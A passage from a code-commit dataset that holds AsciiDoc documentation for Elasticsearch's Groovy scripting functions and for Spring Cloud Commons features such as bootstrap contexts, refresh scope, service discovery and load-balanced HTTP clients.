Returns an empty array if the field has no values.\n\n`doc['field_name'].empty`::\n A boolean indicating if the field has no values within the doc.\n\n`doc['field_name'].lat`::\n The latitude of a geo point type, or `null`.\n\n`doc['field_name'].lon`::\n The longitude of a geo point type, or `null`.\n\n`doc['field_name'].lats`::\n The latitudes of a geo point type, or an empty array.\n\n`doc['field_name'].lons`::\n The longitudes of a geo point type, or an empty array.\n\n`doc['field_name'].arcDistance(lat, lon)`::\n The `arc` distance (in meters) of this geo point field from the provided lat\/lon.\n\n`doc['field_name'].arcDistanceWithDefault(lat, lon, default)`::\n The `arc` distance (in meters) of this geo point field from the provided lat\/lon with a default value\n for empty fields.\n\n`doc['field_name'].planeDistance(lat, lon)`::\n The `plane` distance (in meters) of this geo point field from the provided lat\/lon.\n\n`doc['field_name'].planeDistanceWithDefault(lat, lon, default)`::\n The `plane` distance (in meters) of this geo point field from the provided lat\/lon with a default value\n for empty fields.\n\n`doc['field_name'].geohashDistance(geohash)`::\n The `arc` distance (in meters) of this geo point field from the provided geohash.\n\n`doc['field_name'].geohashDistanceWithDefault(geohash, default)`::\n The `arc` distance (in meters) of this geo point field from the provided geohash with a default value\n for empty fields.\n\n\n[float]\n=== Groovy Built In Functions\n\nThere are several built in functions that can be used within scripts.\nThey include:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Function |Description\n|`sin(a)` |Returns the trigonometric sine of an angle.\n\n|`cos(a)` |Returns the trigonometric cosine of an angle.\n\n|`tan(a)` |Returns the trigonometric tangent of an angle.\n\n|`asin(a)` |Returns the arc sine of a value.\n\n|`acos(a)` |Returns the arc cosine of a value.\n\n|`atan(a)` |Returns the arc tangent of a value.\n\n|`toRadians(angdeg)` |Converts an angle measured in degrees to an\napproximately equivalent angle measured in radians\n\n|`toDegrees(angrad)` |Converts an angle measured in radians to an\napproximately equivalent angle measured in degrees.\n\n|`exp(a)` |Returns Euler's number _e_ raised to the power of value.\n\n|`log(a)` |Returns the natural logarithm (base _e_) of a value.\n\n|`log10(a)` |Returns the base 10 logarithm of a value.\n\n|`sqrt(a)` |Returns the correctly rounded positive square root of a\nvalue.\n\n|`cbrt(a)` |Returns the cube root of a double value.\n\n|`IEEEremainder(f1, f2)` |Computes the remainder operation on two\narguments as prescribed by the IEEE 754 standard.\n\n|`ceil(a)` |Returns the smallest (closest to negative infinity) value\nthat is greater than or equal to the argument and is equal to a\nmathematical integer.\n\n|`floor(a)` |Returns the largest (closest to positive infinity) value\nthat is less than or equal to the argument and is equal to a\nmathematical integer.\n\n|`rint(a)` |Returns the value that is closest in value to the argument\nand is equal to a mathematical integer.\n\n|`atan2(y, x)` |Returns the angle _theta_ from the conversion of\nrectangular coordinates (_x_, _y_) to polar coordinates (r,_theta_).\n\n|`pow(a, b)` |Returns the value of the first argument raised to the\npower of the second argument.\n\n|`round(a)` |Returns the closest _int_ to the argument.\n\n|`random()` |Returns a random _double_ value.\n\n|`abs(a)` |Returns the 
absolute value of a value.\n\n|`max(a, b)` |Returns the greater of two values.\n\n|`min(a, b)` |Returns the smaller of two values.\n\n|`ulp(d)` |Returns the size of an ulp of the argument.\n\n|`signum(d)` |Returns the signum function of the argument.\n\n|`sinh(x)` |Returns the hyperbolic sine of a value.\n\n|`cosh(x)` |Returns the hyperbolic cosine of a value.\n\n|`tanh(x)` |Returns the hyperbolic tangent of a value.\n\n|`hypot(x, y)` |Returns sqrt(_x2_ + _y2_) without intermediate overflow\nor underflow.\n|=======================================================================\n","old_contents":"[[modules-scripting-groovy]]\n=== Groovy Scripting Language\n\ndeprecated[5.0.0,Groovy will be replaced by the new scripting language <<modules-scripting-painless, `Painless`>>]\n\nGroovy is the default scripting language available in Elasticsearch. Although\nlimited by the <<java-security-manager,Java Security Manager>>, it is not a\nsandboxed language and only `file` scripts may be used by default.\n\nEnabling `inline` or `stored` Groovy scripting is a security risk and should\nonly be considered if your Elasticsearch cluster is protected from the outside\nworld. Even a simple `while (true) { }` loop could behave as a denial-of-\nservice attack on your cluster.\n\nSee <<modules-scripting-security, Scripting and Security>> for details\non security issues with scripts, including how to customize class\nwhitelisting.\n\n[float]\n=== Doc value properties and methods\n\nDoc values in Groovy support the following properties and methods (depending\non the underlying field type):\n\n`doc['field_name'].value`::\n The native value of the field. For example, if its a short type, it will be short.\n\n`doc['field_name'].values`::\n The native array values of the field. For example, if its a short type,\n it will be short[]. Remember, a field can have several values within a\n single doc. 
Returns an empty array if the field has no values.\n\n`doc['field_name'].empty`::\n A boolean indicating if the field has no values within the doc.\n\n`doc['field_name'].lat`::\n The latitude of a geo point type, or `null`.\n\n`doc['field_name'].lon`::\n The longitude of a geo point type, or `null`.\n\n`doc['field_name'].lats`::\n The latitudes of a geo point type, or an empty array.\n\n`doc['field_name'].lons`::\n The longitudes of a geo point type, or an empty array.\n\n`doc['field_name'].arcDistance(lat, lon)`::\n The `arc` distance (in meters) of this geo point field from the provided lat\/lon.\n\n`doc['field_name'].arcDistanceWithDefault(lat, lon, default)`::\n The `arc` distance (in meters) of this geo point field from the provided lat\/lon with a default value\n for empty fields.\n\n`doc['field_name'].planeDistance(lat, lon)`::\n The `plane` distance (in meters) of this geo point field from the provided lat\/lon.\n\n`doc['field_name'].planeDistanceWithDefault(lat, lon, default)`::\n The `plane` distance (in meters) of this geo point field from the provided lat\/lon with a default value\n for empty fields.\n\n`doc['field_name'].geohashDistance(geohash)`::\n The `arc` distance (in meters) of this geo point field from the provided geohash.\n\n`doc['field_name'].geohashDistanceWithDefault(geohash, default)`::\n The `arc` distance (in meters) of this geo point field from the provided geohash with a default value\n for empty fields.\n\n\n[float]\n=== Groovy Built In Functions\n\nThere are several built in functions that can be used within scripts.\nThey include:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Function |Description\n|`sin(a)` |Returns the trigonometric sine of an angle.\n\n|`cos(a)` |Returns the trigonometric cosine of an angle.\n\n|`tan(a)` |Returns the trigonometric tangent of an angle.\n\n|`asin(a)` |Returns the arc sine of a value.\n\n|`acos(a)` |Returns the arc cosine of a value.\n\n|`atan(a)` |Returns the arc tangent of a value.\n\n|`toRadians(angdeg)` |Converts an angle measured in degrees to an\napproximately equivalent angle measured in radians\n\n|`toDegrees(angrad)` |Converts an angle measured in radians to an\napproximately equivalent angle measured in degrees.\n\n|`exp(a)` |Returns Euler's number _e_ raised to the power of value.\n\n|`log(a)` |Returns the natural logarithm (base _e_) of a value.\n\n|`log10(a)` |Returns the base 10 logarithm of a value.\n\n|`sqrt(a)` |Returns the correctly rounded positive square root of a\nvalue.\n\n|`cbrt(a)` |Returns the cube root of a double value.\n\n|`IEEEremainder(f1, f2)` |Computes the remainder operation on two\narguments as prescribed by the IEEE 754 standard.\n\n|`ceil(a)` |Returns the smallest (closest to negative infinity) value\nthat is greater than or equal to the argument and is equal to a\nmathematical integer.\n\n|`floor(a)` |Returns the largest (closest to positive infinity) value\nthat is less than or equal to the argument and is equal to a\nmathematical integer.\n\n|`rint(a)` |Returns the value that is closest in value to the argument\nand is equal to a mathematical integer.\n\n|`atan2(y, x)` |Returns the angle _theta_ from the conversion of\nrectangular coordinates (_x_, _y_) to polar coordinates (r,_theta_).\n\n|`pow(a, b)` |Returns the value of the first argument raised to the\npower of the second argument.\n\n|`round(a)` |Returns the closest _int_ to the argument.\n\n|`random()` |Returns a random _double_ value.\n\n|`abs(a)` |Returns the 
absolute value of a value.\n\n|`max(a, b)` |Returns the greater of two values.\n\n|`min(a, b)` |Returns the smaller of two values.\n\n|`ulp(d)` |Returns the size of an ulp of the argument.\n\n|`signum(d)` |Returns the signum function of the argument.\n\n|`sinh(x)` |Returns the hyperbolic sine of a value.\n\n|`cosh(x)` |Returns the hyperbolic cosine of a value.\n\n|`tanh(x)` |Returns the hyperbolic tangent of a value.\n\n|`hypot(x, y)` |Returns sqrt(_x2_ + _y2_) without intermediate overflow\nor underflow.\n|=======================================================================\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d99a7a40c33761f9649ce95e47107e44e91b675d","subject":"Fix property value","message":"Fix property value\n\nfix out of date property \"spring.cloud.loadbalancer.repeat-health-check\" to \"spring.cloud.loadbalancer.health-check.repeat-health-check\"","repos":"spring-cloud\/spring-cloud-commons","old_file":"docs\/src\/main\/asciidoc\/spring-cloud-commons.adoc","new_file":"docs\/src\/main\/asciidoc\/spring-cloud-commons.adoc","new_contents":"= Cloud Native Applications\ninclude::_attributes.adoc[]\n\ninclude::intro.adoc[]\n\n\/\/ TODO: figure out remote includes in docs and replace pasted text\n\/\/ include::https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/docs\/src\/main\/asciidoc\/contributing-docs.adoc[]\nNOTE: Spring Cloud is released under the non-restrictive Apache 2.0 license.\nIf you would like to contribute to this section of the documentation or if you find an error, you can find the source code and issue trackers for the project at {docslink}[github].\n\n== Spring Cloud Context: Application Context Services\n\nSpring Boot has an opinionated view of how to build an application with Spring.\nFor instance, it has conventional locations for common configuration files and has endpoints for common management and monitoring tasks.\nSpring Cloud builds on top of that and adds a few features that many components in a system would use or occasionally need.\n\n=== The Bootstrap Application Context\n\nA Spring Cloud application operates by creating a \"`bootstrap`\" context, which is a parent context for the main application.\nThis context is responsible for loading configuration properties from the external sources and for decrypting properties in the local external configuration files.\nThe two contexts share an `Environment`, which is the source of external properties for any Spring application.\nBy default, bootstrap properties (not `bootstrap.properties` but properties that are loaded during the bootstrap phase) are added with high precedence, so they cannot be overridden by local configuration.\n\nThe bootstrap context uses a different convention for locating external configuration than the main application context.\nInstead of `application.yml` (or `.properties`), you can use `bootstrap.yml`, keeping the external configuration for bootstrap and main context nicely separate.\nThe following listing shows an example:\n\n.bootstrap.yml\n====\n----\nspring:\n application:\n name: foo\n cloud:\n config:\n uri: ${SPRING_CONFIG_URI:http:\/\/localhost:8888}\n----\n====\n\nIf your application needs any application-specific configuration from the server, it is a good idea to set the `spring.application.name` (in `bootstrap.yml` or `application.yml`).\nFor the property `spring.application.name` to be used as the application's context ID, you must set it in `bootstrap.[properties | yml]`.\n\nIf you want to retrieve 
specific profile configuration, you should also set `spring.profiles.active` in `bootstrap.[properties | yml]`.\n\nYou can disable the bootstrap process completely by setting `spring.cloud.bootstrap.enabled=false` (for example, in system properties).\n\n=== Application Context Hierarchies\n\nIf you build an application context from `SpringApplication` or `SpringApplicationBuilder`, the Bootstrap context is added as a parent to that context.\nIt is a feature of Spring that child contexts inherit property sources and profiles from their parent, so the \"`main`\" application context contains additional property sources, compared to building the same context without Spring Cloud Config.\nThe additional property sources are:\n\n* \"`bootstrap`\": If any `PropertySourceLocators` are found in the bootstrap context and if they have non-empty properties, an optional `CompositePropertySource` appears with high priority.\nAn example would be properties from the Spring Cloud Config Server.\nSee \"`<<customizing-bootstrap-property-sources>>`\" for how to customize the contents of this property source.\n\n* \"`applicationConfig: [classpath:bootstrap.yml]`\" (and related files if Spring profiles are active): If you have a `bootstrap.yml` (or `.properties`), those properties are used to configure the bootstrap context.\nThen they get added to the child context when its parent is set.\nThey have lower precedence than the `application.yml` (or `.properties`) and any other property sources that are added to the child as a normal part of the process of creating a Spring Boot application.\nSee \"`<<customizing-bootstrap-properties>>`\" for how to customize the contents of these property sources.\n\nBecause of the ordering rules of property sources, the \"`bootstrap`\" entries take precedence.\nHowever, note that these do not contain any data from `bootstrap.yml`, which has very low precedence but can be used to set defaults.\n\nYou can extend the context hierarchy by setting the parent context of any `ApplicationContext` you create -- for example, by using its own interface or with the `SpringApplicationBuilder` convenience methods (`parent()`, `child()` and `sibling()`).\nThe bootstrap context is the parent of the most senior ancestor that you create yourself.\nEvery context in the hierarchy has its own \"`bootstrap`\" (possibly empty) property source to avoid promoting values inadvertently from parents down to their descendants.\nIf there is a config server, every context in the hierarchy can also (in principle) have a different `spring.application.name` and, hence, a different remote property source.\nNormal Spring application context behavior rules apply to property resolution: properties from a child context override those in\nthe parent, by name and also by property source name.\n(If the child has a property source with the same name as the parent, the value from the parent is not included in the child).\n\nNote that the `SpringApplicationBuilder` lets you share an `Environment` amongst the whole hierarchy, but that is not the default.\nThus, sibling contexts (in particular) do not need to have the same profiles or property sources, even though they may share common values with their parent.\n\n[[customizing-bootstrap-properties]]\n=== Changing the Location of Bootstrap Properties\n\nThe `bootstrap.yml` (or `.properties`) location can be specified by setting `spring.cloud.bootstrap.name` (default: `bootstrap`), `spring.cloud.bootstrap.location` (default: empty) or 
`spring.cloud.bootstrap.additional-location` (default: empty) -- for example, in System properties.\n\nThose properties behave like the `spring.config.*` variants with the same name.\nWith `spring.cloud.bootstrap.location`, the default locations are replaced and only the specified ones are used.\nTo add locations to the list of default ones, `spring.cloud.bootstrap.additional-location` can be used.\nIn fact, they are used to set up the bootstrap `ApplicationContext` by setting those properties in its `Environment`.\nIf there is an active profile (from `spring.profiles.active` or through the `Environment` API in the context you are building), properties in that profile get loaded as well, the same as in a regular Spring Boot app -- for example, from `bootstrap-development.properties` for a `development` profile.\n\n[[overriding-bootstrap-properties]]\n=== Overriding the Values of Remote Properties\n\nThe property sources that are added to your application by the bootstrap context are often \"`remote`\" (for example, from Spring Cloud Config Server).\nBy default, they cannot be overridden locally.\nIf you want to let your applications override the remote properties with their own system properties or config files, the remote property source has to grant it permission by setting `spring.cloud.config.allowOverride=true` (it does not work to set this locally).\nOnce that flag is set, two finer-grained settings control the location of the remote properties in relation to system properties and the application's local configuration:\n\n* `spring.cloud.config.overrideNone=true`: Override from any local property source.\n* `spring.cloud.config.overrideSystemProperties=false`: Only system properties, command line arguments, and environment variables (but not the local config files) should override the remote settings.
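\n\nThe following listing is a minimal sketch of what the remote property source could serve (the flag values are purely illustrative, and remember that these flags have to be granted by the remote source, not set locally):\n\n====\n[source,yaml]\n----\nspring:\n cloud:\n config:\n allowOverride: true\n overrideNone: false\n overrideSystemProperties: false\n----\n====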
\n\n=== Customizing the Bootstrap Configuration\n\nThe bootstrap context can be set to do anything you like by adding entries to `\/META-INF\/spring.factories` under a key named `org.springframework.cloud.bootstrap.BootstrapConfiguration`.\nThis holds a comma-separated list of Spring `@Configuration` classes that are used to create the context.\nAny beans that you want to be available to the main application context for autowiring can be created here.\nThere is a special contract for `@Beans` of type `ApplicationContextInitializer`.\nIf you want to control the startup sequence, you can mark classes with the `@Order` annotation (the default order is `last`).\n\nWARNING: When adding custom `BootstrapConfiguration`, be careful that the classes you add are not `@ComponentScanned` by mistake into your \"`main`\" application context, where they might not be needed.\nUse a separate package name for boot configuration classes and make sure that name is not already covered by your `@ComponentScan` or `@SpringBootApplication` annotated configuration classes.\n\nThe bootstrap process ends by injecting initializers into the main `SpringApplication` instance (which is the normal Spring Boot startup sequence, whether it runs as a standalone application or is deployed in an application server).\nFirst, a bootstrap context is created from the classes found in `spring.factories`.\nThen, all `@Beans` of type `ApplicationContextInitializer` are added to the main `SpringApplication` before it is started.\n\n[[customizing-bootstrap-property-sources]]\n=== Customizing the Bootstrap Property Sources\n\nThe default property source for external configuration added by the bootstrap process is the Spring Cloud Config Server, but you can add additional sources by adding beans of type `PropertySourceLocator` to the bootstrap context (through `spring.factories`).\nFor instance, you can insert additional properties from a different server or from a database.\n\nAs an example, consider the following custom locator:\n\n====\n[source,java]\n----\n@Configuration\npublic class CustomPropertySourceLocator implements PropertySourceLocator {\n\n @Override\n public PropertySource<?> locate(Environment environment) {\n return new MapPropertySource(\"customProperty\",\n Collections.<String, Object>singletonMap(\"property.from.sample.custom.source\", \"worked as intended\"));\n }\n\n}\n----\n====\n\nThe `Environment` that is passed in is the one for the `ApplicationContext` about to be created -- in other words, the one for which we supply additional property sources.\nIt already has its normal Spring Boot-provided property sources, so you can use those to locate a property source specific to this `Environment` (for example, by keying it on `spring.application.name`, as is done in the default Spring Cloud Config Server property source locator).\n\nIf you create a jar with this class in it and then add a `META-INF\/spring.factories` containing the following setting, the `customProperty` `PropertySource` appears in any application that includes that jar on its classpath:\n\n====\n[source]\n----\norg.springframework.cloud.bootstrap.BootstrapConfiguration=sample.custom.CustomPropertySourceLocator\n----\n====\n\n=== Logging Configuration\n\nIf you use Spring Boot to configure log settings, you should place this configuration in `bootstrap.[yml | properties]` if you would like it to apply to all events.\n\nNOTE: For Spring Cloud to initialize logging configuration properly, you cannot use a custom prefix.\nFor example, using `custom.logging.logpath` is not recognized by Spring Cloud when initializing the logging system.\n\n=== Environment Changes\n\nThe application listens for an `EnvironmentChangeEvent` and reacts to the change in a couple of standard ways (additional `ApplicationListeners` can be added as `@Beans` in the normal way).\nWhen an `EnvironmentChangeEvent` is observed, it has a list of key values that have changed, and the application uses those to:\n\n* Re-bind any `@ConfigurationProperties` beans in the context.\n* Set the logger levels for any properties in `logging.level.*`.\n\nNote that the Spring Cloud Config Client does not, by default, poll for changes in the `Environment`.\nGenerally, we would not recommend that approach for detecting changes (although you could set it up with a\n`@Scheduled` annotation).\nIf you have a scaled-out client application, it is better to broadcast the `EnvironmentChangeEvent` to all the instances instead of having them poll for changes (for example, by using the https:\/\/github.com\/spring-cloud\/spring-cloud-bus[Spring Cloud Bus]).\n\nThe `EnvironmentChangeEvent` covers a large class of refresh use cases, as long as you can actually make a change to the `Environment` and publish the event.\n(Note that those APIs are public and part of core Spring.)\nYou can verify that the changes are bound to `@ConfigurationProperties` beans by visiting the `\/configprops` endpoint (a standard Spring Boot Actuator feature).\nFor instance, a `DataSource` can have its `maxPoolSize` changed at runtime (the default `DataSource` created by Spring Boot is a `@ConfigurationProperties` bean) and grow capacity dynamically.\nRe-binding `@ConfigurationProperties` does not cover another large class of use cases, where you need more control over the refresh and where you need a change to be atomic over the whole `ApplicationContext`.\nTo address those concerns, we have `@RefreshScope`.
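\n\nIf you need custom behavior on top of the standard reactions, a simple listener might look as follows (a hypothetical sketch; the class name and log output are not from the original text, and `EnvironmentChangeEvent.getKeys()` returns the keys whose values changed):\n\n====\n[source,java]\n----\n@Component\npublic class EnvironmentChangeLogger implements ApplicationListener<EnvironmentChangeEvent> {\n\n @Override\n public void onApplicationEvent(EnvironmentChangeEvent event) {\n \/\/ event.getKeys() holds the property keys whose values changed\n event.getKeys().forEach(key -> System.out.println(\"Changed: \" + key));\n }\n}\n----\n====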
\n\n[[refresh-scope]]\n=== Refresh Scope\n\nWhen there is a configuration change, a Spring `@Bean` that is marked as `@RefreshScope` gets special treatment.\nThis feature addresses the problem of stateful beans that get their configuration injected only when they are initialized.\nFor instance, if a `DataSource` has open connections when the database URL is changed through the `Environment`, you probably want the holders of those connections to be able to complete what they are doing.\nThen, the next time something borrows a connection from the pool, it gets one with the new URL.\n\nSometimes, it might even be mandatory to apply the `@RefreshScope` annotation on some beans that can only be initialized once.\nIf a bean is \"`immutable`\", you have to either annotate the bean with `@RefreshScope` or specify the classname under the property key: `spring.cloud.refresh.extra-refreshable`.\n\nWARNING: If you have a `DataSource` bean that is a `HikariDataSource`, it cannot be\nrefreshed. It is the default value for `spring.cloud.refresh.never-refreshable`. Choose a\ndifferent `DataSource` implementation if you need it to be refreshed.\n\nRefresh scope beans are lazy proxies that initialize when they are used (that is, when a method is called), and the scope acts as a cache of initialized values.\nTo force a bean to re-initialize on the next method call, you must invalidate its cache entry.\n\nThe `RefreshScope` is a bean in the context and has a public `refreshAll()` method to refresh all beans in the scope by clearing the target cache.\nThe `\/refresh` endpoint exposes this functionality (over HTTP or JMX).\nTo refresh an individual bean by name, there is also a `refresh(String)` method.\n\nTo expose the `\/refresh` endpoint, you need to add the following configuration to your application:\n\n====\n[source,yaml]\n----\nmanagement:\n endpoints:\n web:\n exposure:\n include: refresh\n----\n====\n\nNOTE: `@RefreshScope` works (technically) on a `@Configuration` class, but it might lead to surprising behavior.\nFor example, it does not mean that all the `@Beans` defined in that class are themselves in `@RefreshScope`.\nSpecifically, anything that depends on those beans cannot rely on them being updated when a refresh is initiated, unless it is itself in `@RefreshScope`.\nIn that case, it is rebuilt on a refresh and its dependencies are re-injected.\nAt that point, they are re-initialized from the refreshed `@Configuration`.
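\n\nAs a minimal sketch of the annotation in use (the `GreetingService` bean and the `my.message` property key are hypothetical, not from the original text):\n\n====\n[source,java]\n----\n@RefreshScope\n@Component\npublic class GreetingService {\n\n @Value(\"${my.message:hello}\")\n private String message;\n\n public String getMessage() {\n \/\/ after a refresh invalidates the cache entry, the proxy re-creates\n \/\/ this bean and re-injects the (possibly changed) property value\n return message;\n }\n}\n----\n====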
\n\n=== Encryption and Decryption\n\nSpring Cloud has an `Environment` pre-processor for decrypting property values locally.\nIt follows the same rules as the Spring Cloud Config Server and has the same external configuration through `encrypt.\\*`.\nThus, you can use encrypted values in the form of `{cipher}*`, and, as long as there is a valid key, they are decrypted before the main application context gets the `Environment` settings.\nTo use the encryption features in an application, you need to include Spring Security RSA in your classpath (Maven co-ordinates: `org.springframework.security:spring-security-rsa`), and you also need the full strength JCE extensions in your JVM.\n\ninclude::jce.adoc[]\n\n=== Endpoints\n\nFor a Spring Boot Actuator application, some additional management endpoints are available. You can use:\n\n* `POST` to `\/actuator\/env` to update the `Environment` and rebind `@ConfigurationProperties` and log levels.\n To enable this endpoint, you must set `management.endpoint.env.post.enabled=true`.\n* `\/actuator\/refresh` to reload the bootstrap context and refresh the `@RefreshScope` beans.\n* `\/actuator\/restart` to close the `ApplicationContext` and restart it (disabled by default).\n* `\/actuator\/pause` and `\/actuator\/resume` for calling the `Lifecycle` methods (`stop()` and `start()` on the `ApplicationContext`).\n\nNOTE: If you disable the `\/actuator\/restart` endpoint then the `\/actuator\/pause` and `\/actuator\/resume` endpoints\nwill also be disabled since they are just a special case of `\/actuator\/restart`.\n\n== Spring Cloud Commons: Common Abstractions\n\nPatterns such as service discovery, load balancing, and circuit breakers lend themselves to a common abstraction layer that can be consumed by all Spring Cloud clients, independent of the implementation (for example, discovery with Eureka or Consul).\n\n[[discovery-client]]\n=== The `@EnableDiscoveryClient` Annotation\n\nSpring Cloud Commons provides the `@EnableDiscoveryClient` annotation.\nThis looks for implementations of the `DiscoveryClient` and `ReactiveDiscoveryClient` interfaces with `META-INF\/spring.factories`.\nImplementations of the discovery client add a configuration class to `spring.factories` under the `org.springframework.cloud.client.discovery.EnableDiscoveryClient` key.\nExamples of `DiscoveryClient` implementations include https:\/\/cloud.spring.io\/spring-cloud-netflix\/[Spring Cloud Netflix Eureka], https:\/\/cloud.spring.io\/spring-cloud-consul\/[Spring Cloud Consul Discovery], and https:\/\/cloud.spring.io\/spring-cloud-zookeeper\/[Spring Cloud Zookeeper Discovery].\n\nSpring Cloud will provide both the blocking and reactive service discovery clients by default.\nYou can disable the blocking and\/or reactive clients easily by setting `spring.cloud.discovery.blocking.enabled=false` or `spring.cloud.discovery.reactive.enabled=false`.\nTo completely disable service discovery, you just need to set `spring.cloud.discovery.enabled=false`.\n\nBy default, implementations of `DiscoveryClient` auto-register the local Spring Boot server with the remote discovery server.\nThis behavior can be disabled by setting `autoRegister=false` in `@EnableDiscoveryClient`.\n\nNOTE: `@EnableDiscoveryClient` is no longer required.\nYou can put a `DiscoveryClient` implementation on the classpath to cause the Spring Boot application to register with the service discovery server.\n\n==== Health Indicators\n\nCommons auto-configures the following Spring Boot health indicators.\n\n===== DiscoveryClientHealthIndicator\nThis health indicator is based on the currently registered `DiscoveryClient` implementation.\n\n* To disable entirely, set `spring.cloud.discovery.client.health-indicator.enabled=false`.\n* To disable the description field, set `spring.cloud.discovery.client.health-indicator.include-description=false`.\nOtherwise, it can bubble up as the `description` of the rolled up `HealthIndicator`.\n* To disable service retrieval, set `spring.cloud.discovery.client.health-indicator.use-services-query=false`.\nBy default, the indicator invokes the client's `getServices` method. In deployments with many registered services, it may be too\ncostly to retrieve all services during every check. This skips the service retrieval and instead uses the client's `probe` method.
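\n\nFor example, the following YAML collects these settings in one place (the values shown are illustrative only):\n\n====\n[source,yaml]\n----\nspring:\n cloud:\n discovery:\n client:\n health-indicator:\n enabled: true\n include-description: false\n use-services-query: false\n----\n====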
\n\n===== DiscoveryCompositeHealthContributor\nThis composite health indicator is based on all registered `DiscoveryHealthIndicator` beans. To disable,\nset `spring.cloud.discovery.client.composite-indicator.enabled=false`.\n\n==== Ordering `DiscoveryClient` instances\nThe `DiscoveryClient` interface extends `Ordered`. This is useful when using multiple discovery\nclients, as it allows you to define the order of the returned discovery clients, similar to\nhow you can order the beans loaded by a Spring application. By default, the order of any `DiscoveryClient` is set to\n`0`. If you want to set a different order for your custom `DiscoveryClient` implementations, you just need to override\nthe `getOrder()` method so that it returns the value that is suitable for your setup. Apart from this, you can use\nproperties to set the order of the `DiscoveryClient`\nimplementations provided by Spring Cloud, among others `ConsulDiscoveryClient`, `EurekaDiscoveryClient` and\n`ZookeeperDiscoveryClient`. In order to do it, you just need to set the\n`spring.cloud.{clientIdentifier}.discovery.order` (or `eureka.client.order` for Eureka) property to the desired value.\n\n==== SimpleDiscoveryClient\n\nIf there is no Service-Registry-backed `DiscoveryClient` on the classpath, a `SimpleDiscoveryClient`\ninstance, which uses properties to get information on services and instances, is used.\n\nThe information about the available instances should be passed in via properties in the following format:\n`spring.cloud.discovery.client.simple.instances.service1[0].uri=http:\/\/s11:8080`, where\n`spring.cloud.discovery.client.simple.instances` is the common prefix, then `service1` stands\nfor the ID of the service in question, while `[0]` indicates the index number of the instance\n(as visible in the example, indexes start with `0`), and then the value of `uri` is\nthe actual URI under which the instance is available.\n\n=== ServiceRegistry\n\nCommons now provides a `ServiceRegistry` interface that provides methods such as `register(Registration)` and `deregister(Registration)`, which let you provide custom registered services.\n`Registration` is a marker interface.\n\nThe following example shows the `ServiceRegistry` in use:\n\n====\n[source,java,indent=0]\n----\n@Configuration\n@EnableDiscoveryClient(autoRegister=false)\npublic class MyConfiguration {\n private ServiceRegistry registry;\n\n public MyConfiguration(ServiceRegistry registry) {\n this.registry = registry;\n }\n\n \/\/ called through some external process, such as an event or a custom actuator endpoint\n public void register() {\n Registration registration = constructRegistration();\n this.registry.register(registration);\n }\n}\n----\n====\n\nEach `ServiceRegistry` implementation has its own `Registration` implementation:\n\n* `ZookeeperRegistration` used with `ZookeeperServiceRegistry`\n* `EurekaRegistration` used with `EurekaServiceRegistry`\n* `ConsulRegistration` used with `ConsulServiceRegistry`\n\nIf you are using the `ServiceRegistry` interface, you are going to need to pass the\ncorrect `Registration` implementation for the `ServiceRegistry` implementation you\nare using.\n\n\n==== ServiceRegistry Auto-Registration\n\nBy default, the `ServiceRegistry` implementation auto-registers the running service.\nTo disable that behavior, you can set:\n\n* `@EnableDiscoveryClient(autoRegister=false)` to permanently disable auto-registration.\n* `spring.cloud.service-registry.auto-registration.enabled=false` to disable the behavior through configuration.
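\n\nIn YAML form, the configuration-based switch looks like this (a minimal sketch):\n\n====\n[source,yaml]\n----\nspring:\n cloud:\n service-registry:\n auto-registration:\n enabled: false\n----\n====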
\n\n===== ServiceRegistry Auto-Registration Events\n\nThere are two events that will be fired when a service auto-registers. The first event, called\n`InstancePreRegisteredEvent`, is fired before the service is registered. The second\nevent, called `InstanceRegisteredEvent`, is fired after the service is registered. You can register\n`ApplicationListener`(s) to listen to and react to these events.\n\nNOTE: These events will not be fired if the `spring.cloud.service-registry.auto-registration.enabled` property is set to `false`.\n\n==== Service Registry Actuator Endpoint\n\nSpring Cloud Commons provides a `\/service-registry` actuator endpoint.\nThis endpoint relies on a `Registration` bean in the Spring Application Context.\nCalling `\/service-registry` with GET returns the status of the `Registration`.\nUsing POST to the same endpoint with a JSON body changes the status of the current `Registration` to the new value.\nThe JSON body has to include the `status` field with the preferred value.\nPlease see the documentation of the `ServiceRegistry` implementation you use for the allowed values when updating the status and the values returned for the status.\nFor instance, Eureka's supported statuses are `UP`, `DOWN`, `OUT_OF_SERVICE`, and `UNKNOWN`.\n\n[[rest-template-loadbalancer-client]]\n=== Spring RestTemplate as a Load Balancer Client\n\nYou can configure a `RestTemplate` to use a load-balancer client.\nTo create a load-balanced `RestTemplate`, create a `RestTemplate` `@Bean` and use the `@LoadBalanced` qualifier, as the following example shows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @LoadBalanced\n @Bean\n RestTemplate restTemplate() {\n return new RestTemplate();\n }\n}\n\npublic class MyClass {\n @Autowired\n private RestTemplate restTemplate;\n\n public String doOtherStuff() {\n String results = restTemplate.getForObject(\"http:\/\/stores\/stores\", String.class);\n return results;\n }\n}\n----\n====\n\nCAUTION: A `RestTemplate` bean is no longer created through auto-configuration.\nIndividual applications must create it.\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe `BlockingLoadBalancerClient` is used to create a full physical address.\n\nIMPORTANT: To use a load-balanced `RestTemplate`, you need to have a load-balancer implementation in your classpath.\nAdd the <<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer starter>> to your project in order to use it.\n\n[[webclinet-loadbalancer-client]]\n=== Spring WebClient as a Load Balancer Client\n\nYou can configure `WebClient` to automatically use a load-balancer client.\nTo create a load-balanced `WebClient`, create a `WebClient.Builder` `@Bean` and use the `@LoadBalanced` qualifier, as follows:\n\n====\n[source,java,indent=0]\n----\n@Configuration\npublic class MyConfiguration {\n\n @Bean\n @LoadBalanced\n public WebClient.Builder loadBalancedWebClientBuilder() {\n return WebClient.builder();\n }\n}\n\npublic class MyClass {\n @Autowired\n private WebClient.Builder webClientBuilder;\n\n public Mono<String> doOtherStuff() {\n return webClientBuilder.build().get().uri(\"http:\/\/stores\/stores\")\n .retrieve().bodyToMono(String.class);\n }\n}\n----\n====\n\nThe URI needs to use a virtual host name (that is, a service name, not a host name).\nThe Spring Cloud LoadBalancer is used to create a full physical address.\n\nIMPORTANT: If you want to use a `@LoadBalanced WebClient.Builder`, you need to have a load-balancer\nimplementation in the classpath. We recommend that you add the\n<<spring-cloud-loadbalancer-starter, Spring Cloud LoadBalancer 